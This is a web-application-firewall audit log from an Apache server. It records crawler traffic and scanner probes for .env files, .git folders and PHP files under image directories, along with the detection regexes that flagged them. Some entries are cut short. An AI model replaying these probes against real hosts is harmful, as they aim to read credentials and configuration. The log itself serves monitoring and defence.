/aaina/images/rajasthan-tours-from-jodhpur/images/Rajasthan-Travel-Guides/aainag/https/photo-gallery.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --00f8866f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --00f8866f-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-jodhpur/images/Rajasthan-Travel-Guides/aainag/https/photo-gallery.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-jodhpur/images/Rajasthan-Travel-Guides/aainag/https/photo-gallery.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751249793958501 14651 (- - -) -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751251467307384 20888 (- - -) Stopwatch2: 1751251467307384 20888; combined=5167, p1=165, p2=4649, p3=163, p4=8, p5=181, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --749fe000-Z-- --c9f8f731-A-- [30/Jun/2025:08:14:27.384416 +0530] aGH6CkF9jYm-D35cr2RMoQAAAAQ 103.185.74.40 20598 192.168.74.40 443 --c9f8f731-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --c9f8f731-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c9f8f731-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751251466141330 1243482 (- - -) Stopwatch2: 1751251466141330 1243482; combined=2229, p1=82, p2=2017, p3=0, p4=0, p5=129, sr=50, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c9f8f731-Z-- --f040b757-A-- [30/Jun/2025:08:14:27.387313 +0530] aGH6C77Opy15sEvIlJeLvwAAAA0 54.204.195.252 52128 192.168.74.40 443 --f040b757-B-- GET /.git/ HTTP/1.1 Host: pakhi-infosoul.com User-Agent: Mozilla/5.0 (X11; Linux x86_64) Accept-Encoding: gzip Connection: close --f040b757-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Connection: close Transfer-Encoding: chunked Content-Type: text/html --f040b757-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751251468624456 16549 (- - -) Stopwatch2: 1751251468624456 16549; combined=2622, p1=128, p2=2350, p3=0, p4=0, p5=144, sr=54, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --5da3a362-Z-- --e3c5fd50-A-- [30/Jun/2025:08:14:28.920722 +0530] aGH6C0EH8vgjpHPLG8CMeAAAAAg 103.185.74.40 45955 192.168.74.40 443 --e3c5fd50-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --e3c5fd50-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e3c5fd50-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751251467595544 1325262 (- - -) Stopwatch2: 1751251467595544 1325262; combined=2155, p1=90, p2=1862, p3=0, p4=0, p5=203, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e3c5fd50-Z-- --be22d342-A-- [30/Jun/2025:08:14:29.675195 +0530] aGH6DcMX88FUWUn0Do-0vQAAAA8 20.171.207.114 37862 192.168.74.40 443 --be22d342-B-- GET /returns_refunds.php/images/images/js/admin@oz/sweetalert-master/dist/images/admin@oz/sweetalert-master/dist/js/admin@oz/sweetalert-master/dist/js/warranty.php HTTP/1.1 x-openai-host-hash: 68043589 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate cookie: PHPSESSID=a4shd17djd2acucsns2lrppgs4 host: ozautomotives.com.au --be22d342-F-- HTTP/1.1 200 OK X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751251625757675 16226 (- - -) Stopwatch2: 1751251625757675 16226; combined=2998, p1=144, p2=2681, p3=0, p4=0, p5=172, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --afff6224-Z-- --093fe301-A-- [30/Jun/2025:08:17:06.277734 +0530] aGH6qrvqzP1M7-_jb7C7YQAAABs 103.185.74.40 64942 192.168.74.40 443 --093fe301-B-- POST /wp-cron.php?doing_wp_cron=1751251626.0502901077270507812500 HTTP/1.1 Host: thecouturelove.com User-Agent: WordPress/6.8.1; https://thecouturelove.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --093fe301-C-- --093fe301-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: User-Agent Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --093fe301-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751251626.0502901077270507812500& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751251626260885 17321 (- - -) Stopwatch2: 1751251626260885 17321; combined=5855, p1=127, p2=4690, p3=283, p4=9, p5=746, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --093fe301-Z-- --da3bdb7b-A-- [30/Jun/2025:08:17:06.804841 +0530] aGH6ocMX88FUWUn0Do-1HQAAAA8 47.128.62.62 58638 192.168.74.40 443 --da3bdb7b-B-- GET /wp-includes/css/dist/block-library/style.min.css?ver=6.8.1 HTTP/1.1 Host: princeflexipack.com Connection: keep-alive Accept: text/css,*/*;q=0.1 Accept-Language: en-US,en;q=0.5 User-Agent: Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com) Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: style Referer: https://princeflexipack.com/hanger/ Accept-Encoding: gzip, deflate, br --da3bdb7b-F-- HTTP/1.1 404 Not Found -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b89fc83e-Z-- --6669c975-A-- [30/Jun/2025:08:36:31.819650 +0530] aGH_N4SOIB81O3xn36bFdgAAABE 45.146.130.98 55152 192.168.74.40 80 --6669c975-B-- GET /.env HTTP/1.1 Host: 103.185.74.40 Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --6669c975-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --6669c975-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751252791815014 4936 (- - -) Stopwatch2: 1751252791815014 4936; combined=1149, p1=217, p2=585, p3=0, p4=0, p5=347, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --6669c975-Z-- --179c3d7b-A-- [30/Jun/2025:08:36:32.145995 +0530] aGH_ODiExd2xuA4-1WJMgQAAAA4 45.146.130.98 62911 192.168.74.40 80 --179c3d7b-B-- GET /config/.env HTTP/1.1 Host: 103.185.74.40 Accept: */* Accept-Encoding: gzip, deflate Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --179c3d7b-F-- HTTP/1.1 403 Forbidden Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --179c3d7b-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: default-handler Stopwatch: 1751252792142753 3482 (- - -) Stopwatch2: 1751252792142753 3482; combined=1006, p1=86, p2=534, p3=0, p4=0, p5=385, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --179c3d7b-Z-- --4c7a4537-A-- [30/Jun/2025:08:36:33.941143 +0530] aGH_OOwckA1YnXwN74ycMQAAABI 66.249.65.193 38886 192.168.74.40 443 --4c7a4537-B-- GET /pcmypage?callback=/product%2Fdetail%2jp-auction-x1118481656 HTTP/1.1 Host: hypertechindia.com AMP-Cache-Transform: google;v="1..8" Connection: keep-alive Accept: text/html,application/xhtml+xml,application/signed-exchange;v=b3,application/xml;q=0.9,*/*;q=0.8 From: googlebot(at)googlebot.com User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.7151.103 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) Accept-Encoding: gzip, deflate, br --4c7a4537-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4c7a4537-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2988e96b-Z-- --e1814e06-A-- [30/Jun/2025:08:55:02.635345 +0530] aGIDjvRHKktltpp38igzmwAAACA 176.227.240.31 49198 192.168.74.40 443 --e1814e06-B-- GET /images/logo/logo-eoffice.php HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Connection: close Accept-Encoding: gzip --e1814e06-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --e1814e06-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/images/logo/logo-eoffice.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/images/logo/logo-eoffice.php||SC:/home/adminsu/public_html/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751253902076362 559339 (- - -) Stopwatch2: 1751253902076362 559339; combined=5262, p1=154, p2=4926, p3=0, p4=0, p5=181, sr=60, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e1814e06-Z-- --46283c02-A-- [30/Jun/2025:08:55:02.861356 +0530] aGIDjj1nNpONDKfgpcBkewAAADs 198.38.84.76 42658 192.168.74.40 80 --46283c02-B-- HEAD /.ovi-knowns/tQEMG0ank9dRhBFHo85JNwSvrlKm2Ls6 HTTP/1.1 Host: vervemedia.co.in Accept: */* --46283c02-F-- HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 --46283c02-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Stopwatch: 1751253902854928 6468 (- - -) Stopwatch2: 1751253902854928 6468; combined=3596, p1=104, p2=3317, p3=73, p4=2, p5=100, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --46283c02-Z-- --9195d93d-A-- [30/Jun/2025:08:55:03.576847 +0530] aGIDj8tw_tvrESE6wmA9fgAAABo 20.171.207.232 57192 192.168.74.40 443 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9e7c2935-Z-- --a0a9c629-A-- [30/Jun/2025:09:04:13.984002 +0530] aGIFtRlB8n6vgCPN_bsA-QAAAAM 64.62.197.92 31556 192.168.74.40 443 --a0a9c629-B-- GET /.git/config HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: */* Accept-Encoding: gzip --a0a9c629-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Encoding: gzip Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --a0a9c629-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/.git/config||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: String match "/.git/" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "349"] [id "77318034"] [msg "IM360 WAF: Blocked access to git folder||RSV:7.05||RS:0||T:APACHE||MV:/.git/config||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751254453416265 568035 (- - -) Stopwatch2: 1751254453416265 568035; combined=3911, p1=82, p2=3639, p3=0, p4=0, p5=189, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --a0a9c629-Z-- --8320fe0e-A-- [30/Jun/2025:09:04:14.807346 +0530] aGIFtmCZSWmhN9-g_jb0hAAAAAA 20.171.207.232 55534 192.168.74.40 443 --8320fe0e-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/images/aainag/Car-Rentals-Delhi.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --8320fe0e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8320fe0e-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/images/aainag/Car-Rentals-Delhi.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/images/aainag/Car-Rentals-Delhi.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-Jaisalmer||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751254454790416 17332 (- - -) -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8f224a3c-Z-- --9532f46f-A-- [30/Jun/2025:09:09:01.407136 +0530] aGIG1UEYkAQDRLEk9rG1QQAAAAA 43.167.232.38 56650 192.168.74.40 80 --9532f46f-B-- GET / HTTP/1.1 Host: 103.185.74.40:80 User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --9532f46f-F-- HTTP/1.1 200 OK Last-Modified: Wed, 17 Jun 2020 20:01:33 GMT Accept-Ranges: bytes Content-Length: 163 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Connection: close Content-Type: text/html --9532f46f-H-- Message: Pattern match "\\b(close|keep-alive),[\\t\\n\\r ]{0,1}(close|keep-alive)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/013_i360_generic.conf"] [line "86"] [id "77210350"] [msg "IM360 WAF: Multiple/Conflicting Connection Header Data Found||MVN:REQUEST_HEADERS:Connection||MV:keep-alive, close||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "\\b(?:keep-alive|close),\\s?(?:keep-alive|close)\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "138"] [id "77350508"] [msg "IM360 WAF: Suspicious Connection Header||MV:keep-alive, close||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Stopwatch: 1751254741397884 9642 (- - -) Stopwatch2: 1751254741397884 9642; combined=5253, p1=120, p2=4826, p3=117, p4=4, p5=185, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9532f46f-Z-- --f865ea78-A-- [30/Jun/2025:09:09:06.376135 +0530] aGIG2ohSZjLW3XPHWp4QPwAAAAI 20.171.207.114 40694 192.168.74.40 443 --f865ea78-B-- GET /returns_refunds.php/js/images/admin@oz/sweetalert-master/dist/admin@oz/sweetalert-master/dist/js/images/images/admin@oz/sweetalert-master/dist/js/contact.php HTTP/1.1 x-openai-host-hash: 68043589 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate cookie: PHPSESSID=gp5niqe3j1c50a3qj50pb348m3 host: ozautomotives.com.au --f865ea78-F-- HTTP/1.1 200 OK X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Transfer-Encoding: chunked -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751255038766668 1112937 (- - -) Stopwatch2: 1751255038766668 1112937; combined=2875, p1=129, p2=2403, p3=118, p4=15, p5=210, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e379f149-Z-- --89a2672c-A-- [30/Jun/2025:09:14:05.360609 +0530] aGIIBBrfT5RjsXEkAAqJ4AAAABE 103.185.74.40 45810 192.168.74.40 443 --89a2672c-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --89a2672c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --89a2672c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751255044141696 1219253 (- - -) Stopwatch2: 1751255044141696 1219253; combined=2238, p1=75, p2=1942, p3=0, p4=0, p5=221, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --89a2672c-Z-- --69c4ef43-A-- [30/Jun/2025:09:14:05.820916 +0530] aGIIBbwQtsH0h1Yz_tDZWAAAAA8 47.128.125.103 23202 192.168.74.40 443 --69c4ef43-B-- GET /robots.txt HTTP/1.1 User-Agent: Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com) Host: vervemedia.co.in Connection: close Accept-Encoding: gzip --69c4ef43-F-- HTTP/1.1 403 Forbidden Content-Length: 318 Connection: close Content-Type: text/html; charset=iso-8859-1 --69c4ef43-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/011_i360_otherapps.conf"] [line "433"] [id "77350374"] [msg "IM360 WAF: Scan attempt by bytespider crawler||UA:Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751255044858505 1042245 (- - -) Stopwatch2: 1751255044858505 1042245; combined=4039, p1=92, p2=3673, p3=92, p4=5, p5=177, sr=55, sw=0, l=0, gc=0 Producer: 